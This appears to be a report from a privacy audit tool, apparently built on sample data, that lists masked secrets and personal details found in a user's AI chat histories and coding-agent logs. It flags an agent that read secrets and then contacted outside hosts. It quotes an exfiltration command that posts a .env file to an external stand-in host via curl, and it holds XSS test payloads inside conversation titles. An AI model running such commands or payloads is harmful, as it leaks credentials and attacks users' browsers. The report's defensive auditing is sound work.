npx confessor for your own.We found 17 passwords or keys in your AI conversations. They still work until you change them — this report shows you exactly where and how.
You first introduced yourself by name to Gemini on Mar 3, 2023.
Based on 38 messages in 8 conversations from ChatGPT, Claude.ai, Claude Code, Gemini, Files.
Reconstructed from Claude Code's own session logs — the files it opened, the secrets that passed through its context, and everywhere it could have sent data. A coding agent can read anything your user account can, so this is what one actually touched.
The alarming case: the agent read something sensitive, then reached an outside destination — not the AI provider — moments later. Not proof anything was stolen; the pattern worth checking.
| Kind | File | Why it stands out | Access |
|---|---|---|---|
| Secret | ~/app/.env |
Environment file — app secrets and API keys are conventionally kept here 3 secrets inside | read 1× |
| Secret | ~/.ssh/id_rsa |
SSH private key — a private key that grants server and Git access 1 secret inside | read 1× |
| Personal | ~/Documents/2023-tax-return.pdf |
Tax document — a file that looks like tax paperwork | read 1× |
Every way off your machine the agent used: web requests, network commands, and calls to outside servers (MCP).
| Channel | Destination | What happened | Times |
|---|---|---|---|
| Command | config-sync.example-analytics.net external |
curl -X POST https://config-sync.example-analytics.net/ingest -d @.env | 1× |
| MCP server | telemetry external |
called the "send_event" tool on the telemetry server | 1× |
Each service is graded on how much sensitive information ended up there. If one bar stands out, that’s where to focus.
Every password, key, and personal detail, with a partly-hidden preview — the full values are never written into this report — and plain instructions for fixing each one.
| What it is | Preview (hidden for safety) | Where | First seen | Times | How to fix it |
|---|---|---|---|---|---|
| AWS access key ID | …prod fails with AccessDenied: AWS_ACCESS_KEY_ID=AKIA••••••••••••MPLE AWS_SECRET_ACCESS_KEY=wJal••••••••••••EKEY… |
Claude Code Deploy scripts <script>alert(1)</script> & env setup +1 more | Nov 3, 2024 | 2 | Deactivate the key at console.aws.amazon.com/iam → Users → Security credentials, then rotate. |
| Database URI with credentials | Connection times out from the worker: postgres://appuser:••••••@db.internal.corp:5432/prod — the same string works locally. |
Claude Code Deploy scripts <script>alert(1)</script> & env setup +1 more | Feb 20, 2025 | 2 | Change the database password on the server, then update every connection string that used it. |
| Anthropic API key | I keep getting 401s from the API with sk-a••••••••••••j4Kl — is it malformed? Also my lawyer says I should… |
Claude.ai Key rotation + NDA question | Aug 15, 2024 | 1 | Revoke and rotate at console.anthropic.com → Settings → API Keys. |
| API key / secret assignment | # Deploy notes token = q7R2••••••••••••zY5t Auth header for staging: Authorization: Bearer… |
Files notes.md | Jul 9, 2026 | 1 | Rotate this credential with whatever service issued it. |
| AWS secret access key | …Y_ID=AKIA••••••••••••MPLE AWS_SECRET_ACCESS_KEY=wJal••••••••••••EKEY AWS_REGION=us-east-1 |
Claude Code Deploy scripts <script>alert(1)</script> & env setup | Nov 3, 2024 | 1 | Deactivate the key pair at console.aws.amazon.com/iam and rotate. |
| GitHub personal access token | …sh","content":"#!/bin/bash\nexport GITHUB_TOKEN=ghp_••••••••••••H4jK\ngh release create v1.2.3"} |
Claude Code Deploy scripts <script>alert(1)</script> & env setup | Feb 20, 2025 | 1 | Revoke at github.com → Settings → Developer settings → Personal access tokens. |
| Google API key | …00 [2025-04-02 10:14:23] maps geocode using key AIza••••••••••••Dk2H [2025-04-02 10:14:24] slack notify via xoxb••••••••••••Mn7O… |
Files dump.txt | Jul 9, 2026 | 1 | Regenerate at console.cloud.google.com → APIs & Services → Credentials. |
| JWT (bearer token) | … Auth header for staging: Authorization: Bearer eyJhbGciOi… [JWT REDACTED — 3 segments, 155 chars] npm publish token: npm_••••••••••••q7R8… |
Files notes.md | Jul 9, 2026 | 1 | Invalidate the session it belongs to; if it is long-lived, rotate the signing secret. |
| npm access token | …eyJhbGciOi… [JWT REDACTED — 3 segments, 155 chars] npm publish token: npm_••••••••••••q7R8 wire the invoice to DE•• ···· 3000 |
Files notes.md | Jul 9, 2026 | 1 | Revoke at npmjs.com → Access Tokens. |
| Password | …2025-04-02 10:14:25] legacy ftp login password: Tr•••••••&3 |
Files dump.txt | Jul 9, 2026 | 1 | Change this password everywhere it is used, and enable 2FA on the account. |
| Private key block | -----BEGIN RSA PRIVATE KEY----- … [KEY MATERIAL REDACTED — 189 chars] |
Claude Code Deploy scripts <script>alert(1)</script> & env setup | Nov 4, 2024 | 1 | Treat this key as compromised. Generate a new keypair and revoke this one everywhere it is authorized (servers, GitHub deploy keys, cloud consoles). |
| Private key block | -----BEGIN OPENSSH PRIVATE KEY----- … [KEY MATERIAL REDACTED — 140 chars] |
Claude Code Fix failing deploy, check env config | Mar 10, 2025 | 1 | Treat this key as compromised. Generate a new keypair and revoke this one everywhere it is authorized (servers, GitHub deploy keys, cloud consoles). |
| SendGrid API key | …postgres://appuser:••••••@db.internal.corp:5432/prod SENDGRID_API_KEY=SG.a••••••••••••stuv |
Claude Code Fix failing deploy, check env config | Mar 10, 2025 | 1 | Delete and recreate at app.sendgrid.com → Settings → API Keys. |
| Slack token | …AIza••••••••••••Dk2H [2025-04-02 10:14:24] slack notify via xoxb••••••••••••Mn7O [2025-04-02 10:14:25] legacy ftp login password… |
Files dump.txt | Jul 9, 2026 | 1 | Revoke via api.slack.com → Your Apps → OAuth & Permissions (or rotate the bot token). |
| Stripe live secret key | STRIPE_SECRET_KEY=sk_l••••••••••••I0oP DATABASE_URL=postgres://appuser:••••••@db.internal.corp:5432/prod… |
Claude Code Fix failing deploy, check env config | Mar 10, 2025 | 1 | Roll the key immediately at dashboard.stripe.com → Developers → API keys. |
| Stripe live secret key | … handler 500s in prod. Config has STRIPE_SECRET=sk_l••••••••••••3oK6 — what am I missing? |
ChatGPT Stripe webhook 500s | Mar 3, 2024 | 1 | Roll the key immediately at dashboard.stripe.com → Developers → API keys. |
| URL with embedded credentials | [2025-04-02 10:14:22] gateway health https://admin:••••••@internal.corp/health returned 200 [2025-04-02 10:14:23] maps geocode… |
Files dump.txt | Jul 9, 2026 | 1 | Rotate the credential embedded in this URL and stop passing auth in URLs where possible. |
| IBAN (bank account) | …ling fee: card •••• •••• •••• 1111, backup IBAN DE•• ···· 3000, and our server IP is 52.14.•.•. |
ChatGPT Visa paperwork help +1 more | Jun 3, 2024 | 2 | IBANs alone rarely enable fraud, but combined with your name they can — be aware it was shared. |
| Date of birth | …his form filled. My SSN is •••-••-9999, born on ••/••/1987, and I live at ••• Evergreen Terrace, Springfie… |
ChatGPT Visa paperwork help | Jun 3, 2024 | 1 | Date of birth is a core identity-verification datum; combined with name it enables impersonation. |
| Email address | …heck <script>alert("xss")</script> then contact e•••@realdomain.net right away <img src=x onerror=alert(1)> thanks! |
Claude Code Deploy scripts <script>alert(1)</script> & env setup | Mar 5, 2025 | 1 | Email addresses tie conversations to your identity; know which accounts are now linked to your chat history. |
| Email address | My name is John Carter and my email is j•••@gmail.com — use that in the signature block. |
ChatGPT Stripe webhook 500s | Mar 3, 2024 | 1 | Email addresses tie conversations to your identity; know which accounts are now linked to your chat history. |
| Payment card number (Visa) | Payment details for the filing fee: card •••• •••• •••• 1111, backup IBAN DE•• ···· 3000, and o… |
ChatGPT Visa paperwork help | Jun 3, 2024 | 1 | If this card is still active, consider asking your bank to reissue it. |
| Phone number | … ••• Evergreen Terrace, Springfield. Call me at •••-•••-0132 if that helps. |
ChatGPT Visa paperwork help | Jun 3, 2024 | 1 | Phone numbers are durable identifiers used for account recovery and SIM-swap attacks. |
| Public IP address | …DE•• ···· 3000, and our server IP is 52.14.•.•. |
ChatGPT Visa paperwork help | Jun 3, 2024 | 1 | Public IPs reveal your approximate location and network; rotate via your ISP or VPN if concerned. |
| Street address | … •••-••-9999, born on ••/••/1987, and I live at ••• Evergreen Terrace, Springfield. Call me at •••-•••-0132 if that… |
ChatGPT Visa paperwork help | Jun 3, 2024 | 1 | Home addresses tied to chat accounts are a doxxing risk; avoid re-sharing. |
| US Social Security number | …xt month and I need this form filled. My SSN is •••-••-9999, born on ••/••/1987, and I live at ••• Evergreen Terrace… |
ChatGPT Visa paperwork help | Jun 3, 2024 | 1 | Consider a credit freeze at the three US bureaus if this SSN is yours and was shared with a third party. |
Personal subjects that came up in your conversations, grouped by area of life. Nothing here needs fixing — it’s simply what these services now know about you.
Also relevant: I was diagnosed with hypertension last year and my doctor put me on lisinopril, in case the medical section asks.My therapist upped my sertraline to 100mg and my anxiety is still rough during standups.My visa interview is next month and I need this form filled.Also my lawyer says I should check our NDA before I share the repo with contractors.Unrelated: my salary is $145,000 and my mortgage payment just jumped — can you help me budget this month?Also my lawyer says I should check our NDA before I share the repo with contractors.My wife Sarah thinks I spend too many evenings debugging this repo.My SSN is •••-••-9999, born on ••/••/1987, and I live at ••• Evergreen Terrace, Springfield.Call me at •••-•••-0132 if that helps.My name is John Carter and my email is j•••@gmail.comMy name is John Carter, write a cover letter for the Google APM roleThis section looks for topics, not exact matches, so expect the occasional miss — glance at the conversations before drawing conclusions.
How often sensitive things came up over time.
If you only tidy up a few conversations, start with these.
Three kinds of cleanup: change any passwords that leaked, delete the chats you’d rather not keep, and switch off training on your conversations.
.claude/projects folder in your home folder. Deleting a session file removes that history.A good habit from here on: never paste real passwords or keys into a chat — use a placeholder like MY_PASSWORD instead.